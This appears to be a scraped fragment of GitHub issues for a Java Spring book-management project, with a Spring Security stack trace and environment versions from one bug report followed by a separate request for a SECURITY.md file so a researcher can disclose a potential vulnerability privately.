	at org.springframework.cglib.proxy.MethodProxy.invoke(MethodProxy.java:218) ~[spring-core-5.2.7.RELEASE.jar:5.2.7.RELEASE]
	at org.springframework.aop.framework.CglibAopProxy$DynamicAdvisedInterceptor.intercept(CglibAopProxy.java:687) ~[spring-aop-5.2.7.RELEASE.jar:5.2.7.RELEASE]
	at com.book.manager.service.UserService$$EnhancerBySpringCGLIB$$adfa67b1.loadUserByUsername(<generated>) ~[classes/:na]
	at org.springframework.security.authentication.dao.DaoAuthenticationProvider.retrieveUser(DaoAuthenticationProvider.java:108) ~[spring-security-core-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	... 51 common frames omitted

JDK version: 1.8.0_251
MySQL version: 8.0
The changes I made are below.
image

Security concern

Hello 👋

I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@achiove) has found a potential issue, which I would be eager to share with you.

Could you add a SECURITY.md file with an e-mail address for me to send further details to? GitHub recommends a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future.

Looking forward to hearing from you 👍

(cc @huntr-helper)
